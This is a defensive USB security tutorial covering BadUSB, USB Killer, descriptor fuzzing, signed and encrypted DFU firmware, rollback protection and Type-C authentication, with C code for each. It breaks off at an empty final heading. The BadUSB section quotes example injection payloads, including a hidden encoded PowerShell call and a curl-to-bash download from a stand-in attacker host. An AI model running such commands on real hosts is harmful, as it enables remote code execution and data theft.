USB Part 16: Security in USB

March 31, 2026 Wasil Zafar 22 min read

Secure your USB devices and protect against USB attacks — understand BadUSB, USB Killer, descriptor injection, host-side input validation, secure DFU with firmware signing, USB authentication, and defensive design patterns.

Table of Contents

  1. The USB Attack Surface
  2. BadUSB & HID Injection
  3. USB Killer Attack
  4. Descriptor Fuzzing Defense
  5. Secure DFU — Firmware Signing
  6. Firmware Encryption for DFU
  7. USB Type-C Authentication
  8. Host-Side Input Validation
  9. Secure Boot + USB Combined
  10. USB Security Checklist
  11. Practical Exercises
  12. USB Security Audit Generator
  13. Conclusion & Next Steps

Series Context: This is Part 16 of the 17-part USB Development Mastery series. We have now covered the full software and hardware stack. In this penultimate part we turn to the adversarial perspective — understanding how USB is attacked, and how to design embedded firmware and hardware that resists those attacks.

The USB Attack Surface

USB is simultaneously one of the most useful and one of the most dangerous interfaces in computing. Its plug-and-play convenience — the very feature that made it ubiquitous — is also its greatest security weakness. The moment a USB device is plugged in, the host automatically begins enumerating it, loading drivers, and granting it access to input subsystems, storage, network adapters, and more — before any user authentication can occur.

The USB threat model has two fundamental directions. A malicious device attacking the host exploits the host's automatic trust during enumeration. A malicious host attacking the device sends crafted control requests, oversized data payloads, or lethal voltage levels to compromise or destroy the device. Both directions are real-world threats that have been demonstrated in published research and deployed attack tools.

USB Threat Model Overview

Before we examine individual attack techniques, it is useful to have a structured view of the complete threat landscape. The table below maps each threat category to its target, mechanism, and primary mitigation strategy:

  • BadUSB / HID Injection (target: host OS and user data). Mechanism: a malicious device enumerates as a HID keyboard and types arbitrary commands. Mitigation: USB device whitelisting (USBGuard), endpoint protection software.
  • USB Rubber Ducky / Bash Bunny (target: host OS). Mechanism: pre-programmed HID payloads delivered in milliseconds. Mitigation: physical port locks, USB whitelisting, user education.
  • USB Killer (target: host hardware, controller IC and motherboard). Mechanism: a VBUS-fed charge pump generates a 200 V+ pulse that destroys the USB controller. Mitigation: TVS diodes, polyfuse, dedicated USB protection ICs (hardware only).
  • Descriptor Fuzzing (target: device firmware). Mechanism: a malicious host sends oversized or malformed descriptor requests. Mitigation: bounds checking in the descriptor parser, TinyUSB validation, watchdog.
  • Malicious DFU Upload (target: device firmware). Mechanism: an attacker uploads unsigned firmware via DFU, replacing legitimate code. Mitigation: ECDSA firmware signature verification in the bootloader before flashing.
  • Power Attack, VBUS manipulation (target: device hardware). Mechanism: the host supplies incorrect VBUS voltage or withholds power. Mitigation: VBUS voltage monitoring, polyfuse, TVS diode on the device side.
  • Counterfeit Cable (target: host and device). Mechanism: the cable contains active electronics that intercept or inject data. Mitigation: USB Type-C Authentication, cable inspection, certified cable procurement.
  • Supply Chain Attack (target: end-user host). Mechanism: malicious firmware installed at manufacture; the device appears legitimate. Mitigation: firmware signature verification, binary attestation, USB-IF certification.

The boundary between hardware and firmware attacks is important: hardware attacks (USB Killer, power manipulation) cannot be mitigated in software. Firmware attacks (descriptor fuzzing, malicious DFU) can be defended at the code level but require deliberate engineering effort — they are not automatically handled by most USB stacks.

BadUSB & HID Injection

BadUSB is the name given to the class of attack, first publicly documented by Karsten Nohl and Jakob Lell at Black Hat USA 2014, where a USB device is reprogrammed to impersonate a different device class than it appears to be. The most common and immediately dangerous variant is HID keyboard injection: the malicious device enumerates as a USB HID keyboard and immediately begins "typing" a pre-programmed payload into the host OS.

How HID Keystroke Injection Works

The USB HID keyboard descriptor is a well-documented, standardised structure. Any device that presents a valid HID keyboard descriptor — including the boot protocol entries — will be accepted by every major OS (Windows, Linux, macOS) without any additional driver installation or user permission. The OS treats the device's keystroke reports identically to a legitimate keyboard.

The attack payload is essentially a script written in the target OS's scripting language (PowerShell, Bash, AppleScript) that is "typed" character by character at the maximum rate the HID polling interval allows. At the default 1 ms HID polling rate, a 1,000-character payload can be delivered in under two seconds. Typical payloads:

  • Windows: Win+R → powershell -NoP -W Hidden -Enc <base64 payload> → Enter. The PowerShell command downloads and executes a reverse shell, persistence mechanism, or data exfiltration script.
  • Linux: Ctrl+Alt+T to open a terminal → curl http://attacker.com/payload.sh | bash → Enter.
  • macOS: Cmd+Space → type "Terminal" → Enter → drop the payload bash command.
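What makes these payloads so fast is the compact boot-protocol report format. A minimal sketch of the standard 8-byte HID boot keyboard input report (the struct layout follows the HID specification; the timing helper and its constants are illustrative, assuming one press and one release report per character):

```c
#include <assert.h>
#include <stdint.h>

/* Standard HID boot-protocol keyboard input report: 8 bytes total */
typedef struct __attribute__((packed)) {
    uint8_t modifiers;   /* Bitmask: Ctrl/Shift/Alt/GUI, left and right */
    uint8_t reserved;    /* Always zero                                  */
    uint8_t keycodes[6]; /* Up to 6 simultaneous HID usage codes         */
} hid_kbd_report_t;

/* Each typed character costs two reports (key press, then key release).
 * At the default 1 ms interrupt polling interval, worst-case delivery
 * time for a payload is therefore about 2 ms per character. */
static uint32_t payload_delivery_ms(uint32_t payload_chars)
{
    return payload_chars * 2U;  /* 2 reports/char x 1 ms/report */
}
```

A 1,000-character payload thus needs roughly 2,000 polling intervals, matching the "under two seconds" figure above.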

Commercial Attack Tools

The USB Rubber Ducky (Hak5) is a USB device in the form factor of a USB thumb drive that runs a scripting language called Ducky Script. It is explicitly marketed as a penetration testing tool. The Bash Bunny (also Hak5) is a more capable successor that can emulate multiple USB devices simultaneously (keyboard + mass storage + network adapter) and runs full Linux payloads from a micro-SD card. Both devices cost less than $100 and are available commercially.

Host-Side Defenses

The primary defense against HID injection on the host side is USB device whitelisting — a policy that allows only devices with known, trusted USB Vendor ID (VID) and Product ID (PID) combinations to enumerate fully. On Linux, USBGuard is the de-facto tool for this; it enforces a policy file specifying which devices are permitted and can block new devices by default until explicitly approved. On Windows, Endpoint Protector, USB Lock RP, and Microsoft's own Defender for Endpoint USB device control policies provide equivalent functionality.

Your Device Could Be Perceived as BadUSB: If your legitimate embedded device presents a HID keyboard or composite HID interface, corporate endpoint protection software may block it entirely, quarantine the user's machine, or trigger a security incident. Always use a registered VID/PID pair from the USB-IF, document the device's HID capabilities in your product documentation, and consider offering a non-HID variant for enterprise deployments.

Device-Side Awareness: Your Firmware Is a Weapon

From the device developer's perspective, HID injection awareness means understanding that the exact same firmware capabilities you write for legitimate purposes — sending keystrokes from a keyboard matrix, for example — can be repurposed maliciously if the device is compromised via DFU, supply chain attack, or physical access. This is why DFU security (covered in Sections 5 and 6) is so critical: an unsigned DFU endpoint is a remotely exploitable backdoor into the device's HID behavior.

USB Killer Attack

The USB Killer is a device that draws power from VBUS, uses an internal charge pump (a DC-DC boost converter) to charge capacitors to over 200 V, and then discharges that voltage back through the VBUS and data lines into the host's USB controller. The discharge cycle repeats several times per second. The high-voltage pulse destroys the USB controller IC, and depending on the board layout and ESD protection elsewhere on the PCB, may propagate to destroy the main CPU, memory, and power management ICs.

The original USB Kill v2.0 device generates a -200 V pulse on the data lines. The USB Kill v3.0 added a "test shield" accessory that measures the generated voltage without destroying the target device, for "testing" purposes. Commercial versions are sold openly. Malicious use has resulted in documented cases of laptop, desktop, and industrial computer destruction with repair costs in the thousands of dollars per device.

Why Software Cannot Defend Against USB Killer

The attack operates entirely at the electrical level. The host's USB controller IC — the silicon between the USB connector and the CPU — is the first component in the signal path. The destructive pulse arrives and destroys the USB controller before any software, kernel driver, or security policy has any opportunity to execute. No amount of OS-level USB whitelisting, endpoint protection, or driver hardening provides any protection whatsoever.

Hardware Defense Strategies

All defenses against USB Killer are hardware-level and must be designed into the PCB before the product ships. There is no retrofit option:

  • TVS Diode Arrays: A bidirectional TVS diode (Transient Voltage Suppressor) on VBUS rated for greater than 100 V transient will clamp the destructive pulse. The TVS must be placed physically close to the USB connector — before any PCB trace runs toward sensitive circuitry. The ST USBLC6-2SC6 is rated for ±8 kV ESD (IEC 61000-4-2) but only 17 V clamping voltage, which is insufficient for USB Killer alone. For USB Killer protection, pair a low-capacitance TVS on D+/D- with a higher-voltage VBUS protection component.
  • Polyfuse on VBUS: A resettable polyfuse (PPTC — Positive Temperature Coefficient) in series with VBUS limits sustained current. A 500 mA polyfuse (e.g., Bourns MF-MSMF050) will open when overloaded. While it does not clamp voltage spikes, it limits the energy available to the charge pump, reducing the effectiveness of repeated discharge cycles.
  • Dedicated USB Protection ICs: The ST USBLC6-2SC6 provides ESD protection on D+/D- lines specifically for USB. The TI TPD4S012 provides VBUS overvoltage protection with a built-in load switch that disconnects the USB lines when VBUS exceeds a configurable threshold (5.8 V typical). This is the most robust single-component solution: it disconnects the USB lines from the rest of the circuit before a destructive pulse can propagate.
  • Galvanic Isolation: For industrial applications, USB isolation ICs (e.g., Analog Devices ADuM4160) provide complete electrical isolation between the USB connector and the device circuitry. They pass USB signals magnetically, not electrically. No VBUS surge can cross the isolation barrier. The trade-off is cost (isolation ICs cost $5–$15 per unit) and the limit to Full Speed (12 Mbit/s) USB.
PCB Layout Note: Protection components must be placed as close as possible to the USB connector — ideally within 1–2 mm of the connector pins. Any PCB trace between the connector and the protection component is an unprotected conductor. Route VBUS through the polyfuse first, then the TVS diode, before any trace branches toward the rest of the circuit.
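On the device side, the VBUS-monitoring mitigation from the threat table reduces to a threshold check on an ADC reading. Note the limits of this approach: it catches sustained out-of-spec supplies (the Power Attack row), not a sub-microsecond USB Killer pulse, which only the hardware above can stop. A hedged sketch, assuming a 12-bit ADC, a 3.3 V reference, and a hypothetical 2:1 resistor divider on VBUS (your divider ratio and thresholds will differ):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define ADC_FULL_SCALE   4095U   /* 12-bit ADC */
#define VREF_MILLIVOLTS  3300U   /* 3.3 V reference */
#define DIVIDER_RATIO    2U      /* VBUS is halved before the ADC pin */

/* Convert a raw ADC count into millivolts at the VBUS rail */
static uint32_t vbus_millivolts(uint16_t adc_counts)
{
    return ((uint32_t)adc_counts * VREF_MILLIVOLTS * DIVIDER_RATIO)
           / ADC_FULL_SCALE;
}

/* USB 2.0 allows VBUS at the device to sag to roughly 4.40 V and rise
 * to about 5.25 V; readings outside that window warrant disconnecting
 * the port and flagging a fault. */
static bool vbus_out_of_range(uint16_t adc_counts)
{
    uint32_t mv = vbus_millivolts(adc_counts);
    return (mv < 4400U) || (mv > 5250U);
}
```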

Descriptor Fuzzing Defense

Descriptor fuzzing is the attack technique where a malicious host sends deliberately malformed USB control requests during or after enumeration. The attacker's goal is to trigger buffer overflows, assert failures, or undefined behavior in the device's descriptor parsing code — potentially allowing arbitrary code execution on the device, or at minimum causing a crash that breaks the device's legitimate functionality.

Common Fuzzing Payloads

Typical fuzzing payloads that target USB device firmware include:

  • Oversized wTotalLength in a Configuration Descriptor: The wTotalLength field specifies how many bytes follow the configuration descriptor header. A fuzzed value of 0xFFFF will cause a naive parser to read 65,535 bytes from a buffer that may only be 256 bytes long — a textbook buffer overflow.
  • Wrong bNumInterfaces: Setting bNumInterfaces to 255 causes a parser that iterates over interfaces without bounds checking to walk off the end of the descriptor memory region.
  • Mismatched bLength: Setting individual descriptor bLength values to zero or values larger than the remaining descriptor buffer causes pointer arithmetic errors in length-based parsers.
  • Illegal bDescriptorType values: Values outside the defined range (0x00–0x0F for standard descriptors, 0x20–0x2F for class-specific) should be silently rejected, but buggy parsers may crash or take unintended code paths.
  • GET_DESCRIPTOR for non-existent descriptor index: Requesting string descriptor index 255 when only indices 0–3 are defined should return a STALL, not a buffer read at an arbitrary offset.
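The last payload in that list is defeated by a simple bounds check on the string table. A sketch of the lookup logic (the table contents here are illustrative); in a TinyUSB tud_descriptor_string_cb() implementation, returning NULL makes the stack STALL the GET_DESCRIPTOR request instead of reading at an arbitrary offset:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative string descriptor table: index 0 is the LANGID list */
static const char *const string_table[] = {
    NULL,              /* index 0: LANGID descriptor, built separately */
    "Acme Devices",    /* index 1: manufacturer (example value)        */
    "Widget 3000",     /* index 2: product (example value)             */
    "0001",            /* index 3: serial number (example value)       */
};
#define STRING_COUNT (sizeof(string_table) / sizeof(string_table[0]))

/* Bounds-checked lookup: any index outside the defined range returns
 * NULL, which the caller translates into a STALL response. */
static const char *lookup_string_descriptor(uint8_t index)
{
    if (index >= STRING_COUNT) {
        return NULL;  /* Fuzzed index (e.g., 255): reject with STALL */
    }
    return string_table[index];
}
```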

TinyUSB's Defense Posture

TinyUSB implements bounds checking in its descriptor parsing routines. The core descriptor walking code (tu_desc_next()) advances by bLength bytes and checks that the resulting pointer is still within the total descriptor buffer before dereferencing it. When running a debug build (without NDEBUG defined), TinyUSB uses TU_ASSERT() macros that halt execution with a diagnostic message on any bounds violation — making fuzzing bugs immediately visible during development.

/* ---------------------------------------------------------------
 * TinyUSB descriptor walking — safe iteration pattern
 * tu_desc_next() advances past the current descriptor by bLength bytes
 * ---------------------------------------------------------------*/

/* Iterate over all interface descriptors in a configuration */
void parse_config_descriptor(const uint8_t *p_desc, uint16_t total_len)
{
    const uint8_t *p_end = p_desc + total_len;
    const uint8_t *p     = p_desc;

    while (p < p_end)
    {
        /* Guard: bLength must be at least 2 (bLength + bDescriptorType) */
        if (p[0] < 2) {
            /* Malformed descriptor — bLength is zero or one. Abort parsing. */
            TU_LOG1("Descriptor fuzzing: bLength=%u at offset %u — aborting\r\n",
                    p[0], (unsigned)(p - p_desc));
            return;
        }

        /* Guard: descriptor must not extend past the end of the buffer */
        if ((p + p[0]) > p_end) {
            TU_LOG1("Descriptor fuzzing: descriptor extends past total_len — aborting\r\n");
            return;
        }

        uint8_t type = p[1];
        switch (type)
        {
            case TUSB_DESC_INTERFACE:
                /* Safe: we already verified p[0] >= 2 and p+p[0] <= p_end */
                handle_interface_descriptor((tusb_desc_interface_t const *)p);
                break;

            case TUSB_DESC_ENDPOINT:
                handle_endpoint_descriptor((tusb_desc_endpoint_t const *)p);
                break;

            default:
                /* Unknown or class-specific descriptor — skip it safely */
                break;
        }

        p = tu_desc_next(p);  /* Advances by p[0] bytes (bLength) */
    }
}

Hardening TinyUSB for Production

In a development build, leave NDEBUG undefined (asserts active) so that descriptor fuzzing bugs are caught immediately during testing. In production firmware, after all descriptor tests pass, define NDEBUG for size and speed, but replace the assert-triggered halts with graceful STALL responses or watchdog-triggered resets. The device should never expose a crash (infinite loop, undefined behavior) to an attacker: a clean watchdog reset is always preferable.
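One way to implement that "assert in debug, clean failure in release" policy is a project-level check macro. A sketch with a hypothetical request_watchdog_reset() hook (the name and reset mechanism are MCU-specific; here it is stubbed with a flag so the control flow is testable):

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical hook: real firmware would arm a watchdog-driven reset,
 * e.g. by entering an idle loop and letting the IWDG expire. */
static bool g_reset_requested = false;
static void request_watchdog_reset(void) { g_reset_requested = true; }

/* Debug build: halt loudly via assert() so fuzzing bugs are visible.
 * Release build (NDEBUG defined): request a clean reset and bail out
 * of the calling function instead of crashing in front of the attacker. */
#ifdef NDEBUG
#define USB_CHECK(cond, ret)                \
    do {                                    \
        if (!(cond)) {                      \
            request_watchdog_reset();       \
            return (ret);                   \
        }                                   \
    } while (0)
#else
#define USB_CHECK(cond, ret) assert(cond)
#endif

/* Example use inside a descriptor parser */
static int parse_length_field(unsigned bLength)
{
    USB_CHECK(bLength >= 2, -1);  /* Malformed descriptor */
    return (int)bLength;
}
```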

Open-source USB fuzzing tools built on programmable USB hardware, such as the FaceDancer family of boards, can systematically generate malformed descriptor requests against your device. Testing your device firmware with such a fuzzer before shipping is a low-cost, high-value security activity: a few hours of fuzzing catches the majority of descriptor parsing bugs.

Secure DFU — Firmware Signing

Device Firmware Upgrade (DFU) is the USB class protocol that allows a host to upload new firmware to a device over USB. In an unsigned DFU implementation — which is the default for nearly all development-stage firmware — any attacker with USB access to the device can upload arbitrary firmware. The legitimate bootloader will accept and flash it without question. This is one of the most underappreciated security vulnerabilities in the embedded world: a device with an open DFU port is effectively fully compromised the moment it is connected to a hostile computer.

Signing Approach: ECDSA P-256

The industry-standard approach for firmware signing in constrained embedded environments is ECDSA (Elliptic Curve Digital Signature Algorithm) with the P-256 curve (also known as secp256r1 or prime256v1). ECDSA P-256 provides 128-bit equivalent security with a 64-byte signature and a 64-byte public key — compact enough for flash-constrained devices, and fast enough to verify on a Cortex-M4 in under 100 ms without hardware acceleration.

The signing workflow is:

  1. Build the firmware binary (firmware.bin).
  2. Compute SHA-256 hash of the complete firmware binary.
  3. Sign the SHA-256 hash using the developer's ECDSA P-256 private key (signing_key.pem), producing a 64-byte signature.
  4. Prepend a 108-byte signed header to the firmware image: [magic(4)] [version(4)] [firmware_len(4)] [sha256(32)] [signature(64)].
  5. Upload the signed firmware image (binary + header) to the device via DFU.
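The header layout from step 4 can be pinned down with a packed struct and a compile-time size check. This mirrors the bootloader's header struct; the signing itself would be performed on the host with a tool such as OpenSSL or an HSM API, not in this code:

```c
#include <assert.h>
#include <stdint.h>

/* Signed image header: nothing in it is secret; the signature binds it */
typedef struct __attribute__((packed)) {
    uint32_t magic;          /* 0xDEADBEEF                       */
    uint32_t version;        /* Monotonic firmware version        */
    uint32_t firmware_len;   /* Payload length in bytes           */
    uint8_t  sha256[32];     /* SHA-256 of the payload            */
    uint8_t  signature[64];  /* ECDSA P-256 raw (r||s) signature  */
} fw_header_t;

/* Packing matters: without __attribute__((packed)) the compiler may
 * insert padding and the device would parse the image at wrong offsets. */
_Static_assert(sizeof(fw_header_t) == 4 + 4 + 4 + 32 + 64,
               "header must be exactly 108 bytes");

/* Offset of the firmware payload inside a signed image file */
static uint32_t payload_offset(void) { return (uint32_t)sizeof(fw_header_t); }
```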

The bootloader verification workflow is:

  1. Receive the firmware image from the host via DFU_DNLOAD requests (written to a staging area in flash, not directly to the application area).
  2. After DFU_DNLOAD completes, parse the header from the received image.
  3. Verify the magic number and sanity-check the length field.
  4. Compute SHA-256 over the firmware payload (excluding the header).
  5. Call verify_signature() using the public key embedded in the bootloader.
  6. If verification passes: erase the application flash region and copy the firmware payload. If verification fails: STALL all subsequent DFU requests and set an error state.
/* ---------------------------------------------------------------
 * Secure DFU bootloader — firmware signature verification
 * Uses micro-ecc library (uECC) for ECDSA P-256
 * Public key is embedded in read-only flash (Option Bytes protected region)
 * ---------------------------------------------------------------*/

#include "uECC.h"
#include "sha256.h"

/* Public key — 64 bytes (uncompressed P-256, without 0x04 prefix) */
/* In production: store in OTP / write-protected flash page           */
static const uint8_t BOOTLOADER_PUBLIC_KEY[64] = {
    /* X component (32 bytes) */
    0x6b, 0x17, 0xd1, 0xf2, 0xe1, 0x2c, 0x42, 0x47,
    0xf8, 0xbc, 0xe6, 0xe5, 0x63, 0xa4, 0x40, 0xf2,
    0x77, 0x03, 0x7d, 0x81, 0x2d, 0xeb, 0x33, 0xa0,
    0xf4, 0xa1, 0x39, 0x45, 0xd8, 0x98, 0xc2, 0x96,
    /* Y component (32 bytes) */
    0x4f, 0xe3, 0x42, 0xe2, 0xfe, 0x1a, 0x7f, 0x9b,
    0x8e, 0xe7, 0xeb, 0x4a, 0x7c, 0x0f, 0x9e, 0x16,
    0x2b, 0xce, 0x33, 0x57, 0x6b, 0x31, 0x5e, 0xce,
    0xcb, 0xb6, 0x40, 0x68, 0x37, 0xbf, 0x51, 0xf5
};

/* Firmware image header prepended to every signed image */
typedef struct __attribute__((packed)) {
    uint32_t magic;          /* 0xDEADBEEF — identifies a signed image    */
    uint32_t version;        /* Firmware version (used for downgrade check)*/
    uint32_t firmware_len;   /* Length of the firmware payload in bytes    */
    uint8_t  sha256[32];     /* SHA-256 of the firmware payload            */
    uint8_t  signature[64];  /* ECDSA P-256 signature over sha256[]        */
} FirmwareHeader_t;

/* ---------------------------------------------------------------
 * verify_signature() — call after DFU_DNLOAD completes
 * staging_buf: pointer to received image (header + firmware)
 * total_len:   total bytes received
 * Returns: true if signature is valid, false otherwise
 * ---------------------------------------------------------------*/
bool verify_signature(const uint8_t *staging_buf, uint32_t total_len)
{
    const FirmwareHeader_t *hdr = (const FirmwareHeader_t *)staging_buf;
    const uint8_t *firmware_payload = staging_buf + sizeof(FirmwareHeader_t);
    uint8_t computed_hash[32];

    /* 0. Guard: image must be at least large enough to hold the header */
    if (total_len < sizeof(FirmwareHeader_t)) {
        TU_LOG1("DFU: image shorter than header\r\n");
        return false;
    }

    /* 1. Verify magic number */
    if (hdr->magic != 0xDEADBEEFUL) {
        TU_LOG1("DFU: invalid magic 0x%08lX\r\n", (unsigned long)hdr->magic);
        return false;
    }

    /* 2. Sanity-check firmware length */
    if (hdr->firmware_len == 0 ||
        hdr->firmware_len > APP_FLASH_SIZE ||
        sizeof(FirmwareHeader_t) + hdr->firmware_len != total_len) {
        TU_LOG1("DFU: firmware_len mismatch\r\n");
        return false;
    }

    /* 3. Compute SHA-256 over firmware payload */
    sha256_context ctx;
    sha256_init(&ctx);
    sha256_update(&ctx, firmware_payload, hdr->firmware_len);
    sha256_final(&ctx, computed_hash);

    /* 4. Verify computed hash matches header hash */
    if (memcmp(computed_hash, hdr->sha256, 32) != 0) {
        TU_LOG1("DFU: SHA-256 mismatch — corrupted image\r\n");
        return false;
    }

    /* 5. Verify ECDSA signature */
    const struct uECC_Curve_t *curve = uECC_secp256r1();
    int result = uECC_verify(BOOTLOADER_PUBLIC_KEY,
                             hdr->sha256,      /* message hash */
                             32,               /* hash length  */
                             hdr->signature,   /* raw (r||s) signature */
                             curve);

    if (result != 1) {
        TU_LOG1("DFU: ECDSA signature verification FAILED\r\n");
        return false;
    }

    TU_LOG1("DFU: signature verified OK — firmware v%lu\r\n",
            (unsigned long)hdr->version);
    return true;
}

/* ---------------------------------------------------------------
 * tud_dfu_manifest_cb() — called by the TinyUSB DFU class driver
 * when the host sends a zero-length DFU_DNLOAD (end of download)
 * and the device enters the manifestation phase
 * ---------------------------------------------------------------*/
void tud_dfu_manifest_cb(uint8_t alt)
{
    (void)alt;

    if (!verify_signature(dfu_staging_buffer, dfu_bytes_received)) {
        /* Reject: report errVERIFY (0x07); the stack STALLs further
         * DFU requests until the host issues DFU_CLRSTATUS */
        tud_dfu_finish_flashing(DFU_STATUS_ERR_VERIFY);
        return;
    }

    /* Signature OK: copy firmware to application flash */
    flash_program_firmware(dfu_staging_buffer + sizeof(FirmwareHeader_t),
                           dfu_bytes_received - sizeof(FirmwareHeader_t));
    tud_dfu_finish_flashing(DFU_STATUS_OK);
}
Key Management: The private signing key must never be stored on the device or in the build system without proper protection. Use a Hardware Security Module (HSM) for signing in production. The CI/CD pipeline should invoke the HSM API to sign firmware images — never export the raw private key to a build server or developer machine.

Firmware Encryption for DFU

Firmware signing (Section 5) prevents an attacker from uploading malicious firmware — it does not prevent an attacker from reading your firmware. If the DFU protocol allows the host to upload a firmware image and that image is unencrypted, a competitor or reverse engineer can capture the image and analyze your proprietary algorithms. Firmware encryption addresses this threat.

Encryption Scheme: AES-128-CBC

AES-128-CBC (Advanced Encryption Standard, 128-bit key, Cipher Block Chaining mode) is the standard choice for firmware encryption in embedded systems. It is supported in hardware by STM32's AES peripheral (available on STM32L4, STM32G4, STM32H7), making decryption fast (typically 50–100 MB/s) with minimal MCU load. The 128-bit key provides 128-bit security — overkill for most commercial products but standard practice for compliant systems.

Combined Encrypt-then-Sign

The correct order of operations is encrypt first, then sign. The signed header contains the SHA-256 hash of the encrypted ciphertext, not the plaintext. This ensures:

  • The signature covers exactly what is transmitted — if the encrypted payload is tampered with, signature verification fails.
  • The bootloader verifies the signature on the ciphertext before decrypting — no decryption work is wasted on tampered images.
  • With the reverse order (sign-then-encrypt), the signature could only be checked after decryption, so the bootloader would run its AES engine on completely unauthenticated, attacker-supplied ciphertext.

The bootloader workflow becomes: receive encrypted+signed image → verify ECDSA signature → decrypt AES-128-CBC → write plaintext firmware to application flash.
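The chaining that gives CBC its value — each ciphertext block feeds into the next, so identical plaintext blocks encrypt differently — can be sketched with a toy 16-byte block "cipher" (a byte-wise XOR with the key, standing in for the real AES rounds; this is purely illustrative and must never be used as actual encryption):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define BLOCK 16U

/* Toy stand-in for the AES block operation: XOR with the key.
 * Real firmware would invoke the STM32 AES peripheral here. */
static void toy_cipher(uint8_t blk[BLOCK], const uint8_t key[BLOCK])
{
    for (unsigned i = 0; i < BLOCK; i++) blk[i] ^= key[i];
}

/* CBC encryption: XOR each plaintext block with the previous
 * ciphertext block (the IV for the first), then apply the cipher. */
static void cbc_encrypt(uint8_t *data, uint32_t len,
                        const uint8_t key[BLOCK], const uint8_t iv[BLOCK])
{
    uint8_t chain[BLOCK];
    memcpy(chain, iv, BLOCK);
    for (uint32_t off = 0; off + BLOCK <= len; off += BLOCK) {
        for (unsigned i = 0; i < BLOCK; i++) data[off + i] ^= chain[i];
        toy_cipher(&data[off], key);
        memcpy(chain, &data[off], BLOCK);  /* feed ciphertext forward */
    }
}

/* CBC decryption mirrors it: un-cipher, then XOR with the chain. */
static void cbc_decrypt(uint8_t *data, uint32_t len,
                        const uint8_t key[BLOCK], const uint8_t iv[BLOCK])
{
    uint8_t chain[BLOCK], saved[BLOCK];
    memcpy(chain, iv, BLOCK);
    for (uint32_t off = 0; off + BLOCK <= len; off += BLOCK) {
        memcpy(saved, &data[off], BLOCK);  /* ciphertext for next chain */
        toy_cipher(&data[off], key);       /* toy XOR is its own inverse */
        for (unsigned i = 0; i < BLOCK; i++) data[off + i] ^= chain[i];
        memcpy(chain, saved, BLOCK);
    }
}
```

Encrypting two identical 16-byte blocks produces two different ciphertext blocks, which is exactly why CBC hides the repeated patterns common in firmware images.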

Key Storage Options

The AES decryption key must be stored on the device. The security of the entire encryption scheme depends entirely on the security of this key storage. Options in order of security:

  • OTP Flash (One-Time Programmable): STM32 devices have OTP memory pages that can be written once and become permanently read-only. Store the AES key here. RDP Level 2 (Section 9) prevents the key from being read via debug interfaces. Cost: zero, already on-chip.
  • Dedicated Hardware Security Element (Microchip ATECC608A): A secure element connected via I2C. The AES key never leaves the chip — the bootloader sends ciphertext to the ATECC608A over I2C and receives plaintext back. Physical attacks (decapping, fault injection) trigger a tamper response that zeroizes the key. Cost: approximately $0.50 per unit in volume.
  • STM32 TrustZone (Cortex-M33, e.g., STM32L5, STM32U5): The Secure world (running in the Secure Processing Environment) holds the key and the decryption logic. The Non-Secure bootloader cannot access Secure-world memory. Requires ARM TrustZone-M programming model. Cost: select a TrustZone-enabled MCU variant.

Downgrade Attack Prevention

Encryption and signing alone do not prevent downgrade attacks, where an attacker re-uploads an older, legitimately signed firmware version that contains a known vulnerability. The defense is to include a firmware version number in the signed header: the bootloader stores the highest version number ever installed (in OTP flash or EEPROM) and rejects any incoming image whose version is lower than that stored minimum. This is called a monotonic counter or rollback protection counter.

/* ---------------------------------------------------------------
 * Downgrade attack prevention — version rollback check
 * Stored in OTP flash (written once per firmware update)
 * ---------------------------------------------------------------*/

#define OTP_FIRMWARE_VERSION_ADDR   0x1FFF7800UL  /* STM32F4 OTP area base */

uint32_t get_minimum_allowed_version(void)
{
    /* Read the highest version number ever flashed from OTP */
    return *((volatile uint32_t *)OTP_FIRMWARE_VERSION_ADDR);
}

bool check_version_rollback(uint32_t incoming_version)
{
    uint32_t min_version = get_minimum_allowed_version();

    /* OTP erased state is 0xFFFFFFFF — treat as "no minimum set" */
    if (min_version == 0xFFFFFFFFUL) {
        return true;  /* First firmware flash — allow any version */
    }

    if (incoming_version < min_version) {
        TU_LOG1("DFU: rollback rejected — incoming v%lu < min v%lu\r\n",
                (unsigned long)incoming_version,
                (unsigned long)min_version);
        return false;
    }
    return true;
}

void update_minimum_version(uint32_t new_version)
{
    uint32_t current_min = get_minimum_allowed_version();
    if (new_version > current_min) {
        /* Write new minimum to OTP — irreversible, one-time operation.
         * Caveat: OTP bits can only transition 1 -> 0, so a plain word
         * overwrite only works when the new value clears additional
         * bits. Production designs typically burn one OTP word per
         * update, or encode the counter as a bit-strike bitmap. */
        HAL_FLASH_Unlock();
        HAL_FLASH_Program(FLASH_TYPEPROGRAM_WORD,
                          OTP_FIRMWARE_VERSION_ADDR,
                          new_version);
        HAL_FLASH_Lock();
    }
}

USB Type-C Authentication

The USB Authentication Specification (published by the USB Implementers Forum, revision 1.0 and later 1.3) defines a cryptographic challenge-response protocol that allows USB hosts, devices, and cables to authenticate each other before data transfer or power delivery begins. It uses the USB Power Delivery protocol layer (BMC-encoded messages on the CC1/CC2 pins) as the transport for the authentication exchange.

How USB Authentication Works

The authentication protocol is built on a PKI (Public Key Infrastructure) certificate chain, similar in concept to TLS certificates in web browsers:

  1. The Initiator (typically the host) sends a GET_DIGESTS message, requesting a hash of the certificate chain stored in the Responder (device or cable).
  2. The Initiator retrieves the full certificate chain with GET_CERTIFICATE requests (a sequence of X.509-like certificates, rooted in the USB-IF CA).
  3. The Initiator sends a CHALLENGE containing a 32-byte nonce.
  4. The Responder computes ECDSA-P256(SHA-256(nonce || certificate_digest)) using its private key and returns the 64-byte signature in a CHALLENGE_AUTH response.
  5. The Initiator verifies the signature against the public key extracted from the certificate chain. If verification succeeds, the device is authenticated as genuine.

Primary Use Cases

The USB Authentication Specification was designed with three primary use cases in mind:

  • Cable Authentication: A USB-C cable containing an active eMarker chip can be authenticated as a genuine, certified cable. This prevents counterfeit cables from falsely claiming high-power (100 W+) or high-speed (USB 3.2, USB4) capabilities.
  • Charger Authentication: A USB-C Power Delivery charger can be authenticated, preventing counterfeit chargers from masquerading as genuine OEM accessories.
  • Device Authentication: A peripheral device can present a certificate, allowing the host to verify it is genuine before allowing sensitive operations (e.g., Apple MFi, which uses a variant of this concept).

Deployment Status in Embedded Devices

